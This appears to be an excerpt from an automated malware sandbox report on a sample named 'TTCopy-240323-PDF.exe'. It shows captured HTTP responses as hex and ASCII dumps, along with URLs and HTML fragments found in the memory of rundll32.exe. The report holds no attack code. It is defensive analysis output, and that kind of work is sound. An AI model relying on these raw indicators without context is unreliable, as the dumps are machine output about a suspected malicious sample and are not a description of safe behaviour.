6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2d 63 6f 6e 74 65 6e 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:08 GMTServer: Apache/2.4.56 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:11 GMTServer: Apache/2.4.56 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:14 GMTServer: Apache/2.4.56 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.0Date: Thu, 30 Mar 2023 08:27:01 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 73 6e 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qsni/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Mar 2023 08:26:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-storePragma: no-cacheContent-Type: text/html; Charset=gb2312Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: WAF/2.0Date: Thu, 30 Mar 2023 08:26:31 GMTConnection: closeContent-Length: 2211Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 c9 63 7c 93 be 5b 94 cb e6 b3 08 98 dd 87 0f 1f ca db dc 36 cf 66 f4 63 91 b7 19 21 da ae b6 f3 5f b4 2e 2e 3f fb e8 a4 5a b6 f9 b2 dd 7e 73 bd ca 3f 4a a7 f2 d7 67 1f b5 f9 bb f6 2e de 3d 4c a7 f3 ac 6e f2 f6 b3 8b c9 db bd 7b bb 7b 1f a5 77 09 4e 5b b4 65 7e f4 f8 ae fc 4c 1e df 15 f8 c9 e3 49 35 bb 4e 9b f6 ba cc 3f fb 28 4d d3 55 36 9b 15 cb 8b 47 3b 87 e9 22 ab 2f 8a 25 7e 3b a7 5e 1e ed ee af de dd dd 1d df 4f bf 28 a6 75 d5 54 e7 6d fa fb 64 f3 bc 18 a5 ff ec bf 90 fc 73 ff f9 a8 a1 f1 6e 37 79 5d 9c 13 0a 55 59 d5 8f 7e fc fe fd fb 87 34 96 e4 f1 ac b8 34 7d 18 a8 69 b6 6e ab c3 ab 62 d6 ce 1f 3d 3c d8 59 bd 43 4b 42 80 1e bf f9 24 9b be bd a8 ab f5 72 f6 28 5d d7 e5 d6 c7 a0 05 d1 6d 7f 67 7f dc 64 e7 f9 ac ba 18 4f 97 77 8b 45 76 91 37 77 f5 13 a2 7b ce 03 1c af 96 17 1f df 49 97 d5 76 9d af f2 ac 3d 24 7c 2f e6 ed a3 7b 3b 41 87 3f e6 f7 28 28 49 8b a0 f9 74 5d 37 34 aa 55 55 10 cd eb 43 0f b3 1f 3f df d9 39 3c 2f 4a fa f8 51 9a 95 ab 79 b6 55 ad b2 69 d1 5e 7f b6 73 e7 30 d5 df 1f a5 d4 a8 ac b2 f6 51 99 9f b7 87 1f a5 d5 72 5a 16 d3 b7 9f 7d 54 56 d3 0c 9c 32 9e d7 f9 f9 67 66 88 60 0d 1d 10 0d f1 63 0f db bb 84 ae fb 8b fe 30 b8 0b f8 1a 48 2b 69 f7 ef 01 75 1d c7 2e 8f 43 a7 78 bb ad 56 8f 1e fa 1f f0 7b f2 11 66 7c bb 29 7e 90 3f da db a3 3f 5d df 3f f6 78 95 16 b3 cf 3e ca eb ba aa 7f ff 69 35 cb 7f ff d5 47 47 8f b3 54 3e 3d a1 0f 3e 3a a2 c9 79 7c 37 3b fa db fe fb 7f e1 97 3d 6e 56 d9 d2 a2 67 a1 ee 7e 4a 50 4d bf 20 c7 a3 dd fb f4 c9 47 47 5b ff e0 3f fd af fd 3b 7f e7 ff f5 2f fc cf ff c4 af fc a7 ff c5 bf e5 bf fe 07 ff b6 7f e0 3f fc e7 fe 73 00 fa 97 fe f1 7f f1 2f b9 f3 f8 2e c0 11 1b af fa 08 7d d1 5c 10 22 de 37 84 14 d3 d3 88 da 64 d2 78 f4 bc db d2 97 d9 6c fb d3 9d 4f 1f de db de dd de 1d 43 7a 7e 8f f3 ba 5a 7c d6 b4 59 fb 51 da 12 a7 92 18 7d f4 fb 4f ca 6c f9 f6 23 33 08 e5 ed dd 7b 0f cf cf 0f 44 36 bc 31 a5 10 c4 ed 59 3e ad 6a 9e d2 47 cb 6a 49 14 f9 d7 ff 81 bf f5 2f fb 27 ff db bf fd 3f fd 7b 7f 25 08 93 fc 18 e1 47 8f c5 f0 c7 3d 66 a8 f3 59 51 e7 d3 f6 4d f5 ed aa 69 b7 ee 10 a3 7c fd 9e 43 1a a7 7b 98
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-storePragma: no-cacheContent-Type: text/html; Charset=gb2312Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/8.5X-Powered-By: WAF/2.0Date: Thu, 30 Mar 2023 08:26:34 GMTConnection: closeContent-Length: 2211Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 c9 63 7c 93 be 5b 94 cb e6 b3 08 98 dd 87 0f 1f ca db dc 36 cf 66 f4 63 91 b7 19 21 da ae b6 f3 5f b4 2e 2e 3f fb e8 a4 5a b6 f9 b2 dd 7e 73 bd ca 3f 4a a7 f2 d7 67 1f b5 f9 bb f6 2e de 3d 4c a7 f3 ac 6e f2 f6 b3 8b c9 db bd 7b bb 7b 1f a5 77 09 4e 5b b4 65 7e f4 f8 ae fc 4c 1e df 15 f8 c9 e3 49 35 bb 4e 9b f6 ba cc 3f fb 28 4d d3 55 36 9b 15 cb 8b 47 3b 87 e9 22 ab 2f 8a 25 7e 3b a7 5e 1e ed ee af de dd dd 1d df 4f bf 28 a6 75 d5 54 e7 6d fa fb 64 f3 bc 18 a5 ff ec bf 90 fc 73 ff f9 a8 a1 f1 6e 37 79 5d 9c 13 0a 55 59 d5 8f 7e fc fe fd fb 87 34 96 e4 f1 ac b8 34 7d 18 a8 69 b6 6e ab c3 ab 62 d6 ce 1f 3d 3c d8 59 bd 43 4b 42 80 1e bf f9 24 9b be bd a8 ab f5 72 f6 28 5d d7 e5 d6 c7 a0 05 d1 6d 7f 67 7f dc 64 e7 f9 ac ba 18 4f 97 77 8b 45 76 91 37 77 f5 13 a2 7b ce 03 1c af 96 17 1f df 49 97 d5 76 9d af f2 ac 3d 24 7c 2f e6 ed a3 7b 3b 41 87 3f e6 f7 28 28 49 8b a0 f9 74 5d 37 34 aa 55 55 10 cd eb 43 0f b3 1f 3f df d9 39 3c 2f 4a fa f8 51 9a 95 ab 79 b6 55 ad b2 69 d1 5e 7f b6 73 e7 30 d5 df 1f a5 d4 a8 ac b2 f6 51 99 9f b7 87 1f a5 d5 72 5a 16 d3 b7 9f 7d 54 56 d3 0c 9c 32 9e d7 f9 f9 67 66 88 60 0d 1d 10 0d f1 63 0f db bb 84 ae fb 8b fe 30 b8 0b f8 1a 48 2b 69 f7 ef 01 75 1d c7 2e 8f 43 a7 78 bb ad 56 8f 1e fa 1f f0 7b f2 11 66 7c bb 29 7e 90 3f da db a3 3f 5d df 3f f6 78 95 16 b3 cf 3e ca eb ba aa 7f ff 69 35 cb 7f ff d5 47 47 8f b3 54 3e 3d a1 0f 3e 3a a2 c9 79 7c 37 3b fa db fe fb 7f e1 97 3d 6e 56 d9 d2 a2 67 a1 ee 7e 4a 50 4d bf 20 c7 a3 dd fb f4 c9 47 47 5b ff e0 3f fd af fd 3b 7f e7 ff f5 2f fc cf ff c4 af fc a7 ff c5 bf e5 bf fe 07 ff b6 7f e0 3f fc e7 fe 73 00 fa 97 fe f1 7f f1 2f b9 f3 f8 2e c0 11 1b af fa 08 7d d1 5c 10 22 de 37 84 14 d3 d3 88 da 64 d2 78 f4 bc db d2 97 d9 6c fb d3 9d 4f 1f de db de dd de 1d 43 7a 7e 8f f3 ba 5a 7c d6 b4 59 fb 51 da 12 a7 92 18 7d f4 fb 4f ca 6c f9 f6 23 33 08 e5 ed dd 7b 0f cf cf 0f 44 36 bc 31 a5 10 c4 ed 59 3e ad 6a 9e d2 47 cb 6a 49 14 f9 d7 ff 81 bf f5 2f fb 27 ff db bf fd 3f fd 7b 7f 25 08 93 fc 18 e1 47 8f c5 f0 c7 3d 66 a8 f3 59 51 e7 d3 f6 4d f5 ed aa 69 b7 ee 10 a3 7c fd 9e 43 1a a7 7b 98
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="facebook" href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597/" target="Array"><i class="fa fa-facebook-official" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Instagram" href="https://www.instagram.com/tricoshipping" target="Array"><i class="fa fa-instagram" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="twitter" href="http://www.twitter.com/UgTrico" ><i class="fa fa-twitter-square" style="color: #ffffff;"></i></a></li></ul></div> equals www.facebook.com (Facebook)
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="facebook" href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597/" target="Array"><i class="fa fa-facebook-official" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Instagram" href="https://www.instagram.com/tricoshipping" target="Array"><i class="fa fa-instagram" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="twitter" href="http://www.twitter.com/UgTrico" ><i class="fa fa-twitter-square" style="color: #ffffff;"></i></a></li></ul></div> equals www.twitter.com (Twitter)
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="facebook" href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597/" target="Array"><i class="fa fa-facebook-official" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Instagram" href="https://www.instagram.com/tricoshipping" target="Array"><i class="fa fa-instagram" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="twitter" href="http://www.twitter.com/UgTrico" ><i class="fa fa-twitter-square" style="color: #ffffff;"></i></a></li></ul></div> equals www.facebook.com (Facebook)
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <ul class="social-links"><li><a rel="nofollow" class="social-tooltip" title="facebook" href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597/" target="Array"><i class="fa fa-facebook-official" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="Instagram" href="https://www.instagram.com/tricoshipping" target="Array"><i class="fa fa-instagram" style="color: #ffffff;"></i></a></li><li><a rel="nofollow" class="social-tooltip" title="twitter" href="http://www.twitter.com/UgTrico" ><i class="fa fa-twitter-square" style="color: #ffffff;"></i></a></li></ul></div> equals www.twitter.com (Twitter)
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <div class="fb-page" data-href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597" data-width="310" data-height="220" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597"><a href="https://www.facebook.com/Trico-Shipping-UG-Germany-1019423898174597">Trico Shipping Germany</a></blockquote></div></div> equals www.facebook.com (Facebook)
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://404.safedog.cn/Scripts/url.js
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://404.safedog.cn/images/safedogsite/head.png
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://404.safedog.cn/sitedog_stat_new.html
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000006664000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbs.safedog.cn/thread-60693-1-1.html?from=stat
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000005842000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Open
          Source: rundll32.exe, 0000000E.00000002.778641956.000000000601C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: rundll32.exe, 0000000E.00000002.779281568.00000000070B0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.778641956.0000000005B66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: rundll32.exe, 0000000E.00000002.778641956.0000000005842000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://justinmezzell.com
          Source: TTCopy-240323-PDF.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
